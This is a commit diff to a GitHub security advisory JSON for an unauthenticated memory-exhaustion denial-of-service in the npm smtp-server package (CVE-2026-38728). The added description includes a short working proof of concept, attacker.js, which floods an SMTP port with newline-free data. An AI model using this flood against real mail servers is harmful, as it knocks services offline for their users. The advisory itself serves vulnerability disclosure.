Skip to content

Commit 869eed6

Browse files
committed
1 parent 655fe79 commit 869eed6

1 file changed

Lines changed: 27 additions & 3 deletions

File tree

advisories/unreviewed/2026/05/GHSA-fv2f-rw9f-v9cm/GHSA-fv2f-rw9f-v9cm.json

Lines changed: 27 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -1,19 +1,43 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-fv2f-rw9f-v9cm",
4-
"modified": "2026-05-15T18:30:33Z",
4+
"modified": "2026-05-15T18:31:38Z",
55
"published": "2026-05-15T15:30:45Z",
66
"aliases": [
77
"CVE-2026-38728"
88
],
9-
"details": "An issue in Nodemailer smtp_server before v.3.18.3 allows a remote attacker to cause a denial of service via the SMTPStream._write, lib/smtp-stream.js components",
9+
"summary": "Memory Exhaustion DoS in smtp-server's Command Parser",
10+
"details": "### Summary\n\nAn unauthenticated memory exhaustion denial-of-service vulnerability in `smtp-server`'s command parser allows any remote client to consume unbounded server memory by sending data without newline characters. The server's `_remainder` buffer in `SMTPStream._write` grows without limit, leading to heap exhaustion, prolonged GC pauses that freeze the event loop, and in some cases, process crash. \n\n### Details\n\nThe `_write` method in `lib/smtp-stream.js` appends incoming TCP chunks to `this._remainder` in command mode. The buffer is only emptied when a newline is found. If a client never sends a newline, the `_remainder` value will grow indefinitely, causing excess memory consumption.\n\n### PoC\n\n**test_server.js**\n\n```js\nimport { SMTPServer } from \"smtp-server\";\n\nconst server = new SMTPServer({ authOptional: true, logger: false });\n\n\nserver.listen(2527, '127.0.0.1', () => {\n    console.log('listening on 2527');\n    \n    let tick = 0;\n    setInterval(() => {\n        const mb = (process.memoryUsage().rss / 1024 / 1024).toFixed(1);\n        console.log(`tick=${++tick}  RSS=${mb} MB`);\n    }, 1000);\n});\n\nserver.on('error', err => { console.error(err.message); process.exit(1); });\n```\n\n**attacker.js**\n\n```js\n\nimport net from 'node:net';\n\nconst buff_chunk = Buffer.alloc(64 * 1024, 0x41);\nconst socket = net.createConnection(2527, '127.0.0.1');\n\nsocket.once('data', flood);\n\nfunction flood() {\n    const ok = socket.write(buff_chunk);\n    if (ok) setImmediate(flood);\n    else socket.once('drain', flood);\n}\n\nsocket.on('error', err => console.error(err.message));\n\n```\n\n\n### Impact\n\n**Who is impacted:** Any application using the `smtp-server` npm package to accept SMTP connections on a public interface. This attack occurs before authentication, so authenticated services offer no protection. \n\n**Severity:** High. A single connection can exhaust the process memory, while multiple connections multiply the effect linearly. The attack is trivial to execute. ",
1011
"severity": [
1112
{
1213
"type": "CVSS_V3",
1314
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
1415
}
1516
],
16-
"affected": [],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "npm",
21+
"name": "smtp-server"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": ">= 3.18.3"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "< 3.18.3"
38+
}
39+
}
40+
],
1741
"references": [
1842
{
1943
"type": "ADVISORY",

0 commit comments

Comments
 (0)